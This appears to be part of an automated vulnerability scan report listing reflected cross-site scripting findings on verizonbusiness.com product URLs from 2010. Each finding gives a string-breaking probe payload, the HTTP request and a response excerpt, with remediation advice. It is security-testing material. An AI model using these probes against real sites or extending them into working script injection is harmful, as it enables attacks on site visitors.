Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d0e5"%3b2d5f6bef341 was submitted in the REST URL parameter 1. This input was echoed as 5d0e5";2d5f6bef341 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products5d0e5"%3b2d5f6bef341/communications/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products5d0e5";2d5f6bef341/communications/traditional-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALID
...[SNIP]...

1.68. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69431'%3bff4558fa136 was submitted in the REST URL parameter 1. This input was echoed as 69431';ff4558fa136 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products69431'%3bff4558fa136/communications/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products69431';ff4558fa136/communications/traditional-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.69. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dec1"%3bac9d6812890 was submitted in the REST URL parameter 2. This input was echoed as 2dec1";ac9d6812890 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications2dec1"%3bac9d6812890/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42355
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications2dec1";ac9d6812890/traditional-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.70. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a88f3'%3bad0bd57bd2c was submitted in the REST URL parameter 2. This input was echoed as a88f3';ad0bd57bd2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsa88f3'%3bad0bd57bd2c/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:44:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42355
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsa88f3';ad0bd57bd2c/traditional-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.71. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0571'%3b3c9c2508f89 was submitted in the REST URL parameter 3. This input was echoed as d0571';3c9c2508f89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/traditional-telephonyd0571'%3b3c9c2508f89/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43500
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/traditional-telephonyd0571';3c9c2508f89/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.72. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b962"%3b576fb33505f was submitted in the REST URL parameter 3. This input was echoed as 3b962";576fb33505f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/traditional-telephony3b962"%3b576fb33505f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43500
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/traditional-telephony3b962";576fb33505f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.73. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 637a6"%3b296beb7d083 was submitted in the REST URL parameter 1. This input was echoed as 637a6";296beb7d083 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products637a6"%3b296beb7d083/communications/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products637a6";296beb7d083/communications/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.74. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f257'%3b68890547f97 was submitted in the REST URL parameter 1. This input was echoed as 4f257';68890547f97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products4f257'%3b68890547f97/communications/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products4f257';68890547f97/communications/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.75. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfd1d'%3ba91da3eaeef was submitted in the REST URL parameter 2. This input was echoed as cfd1d';a91da3eaeef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationscfd1d'%3ba91da3eaeef/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:30 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationscfd1d';a91da3eaeef/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.76. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4eb"%3b03656175578 was submitted in the REST URL parameter 2. This input was echoed as 2e4eb";03656175578 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications2e4eb"%3b03656175578/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications2e4eb";03656175578/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.77. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e5e'%3b3fc27c4ce6f was submitted in the REST URL parameter 3. This input was echoed as 44e5e';3fc27c4ce6f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/ucc44e5e'%3b3fc27c4ce6f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/ucc44e5e';3fc27c4ce6f/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.78. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8a09"%3bab440ed2f3d was submitted in the REST URL parameter 3. This input was echoed as f8a09";ab440ed2f3d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/uccf8a09"%3bab440ed2f3d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/uccf8a09";ab440ed2f3d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.79. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc451'%3b89dc88df858 was submitted in the REST URL parameter 1. This input was echoed as fc451';89dc88df858 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsfc451'%3b89dc88df858/it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:04 GMT
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsfc451';89dc88df858/it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

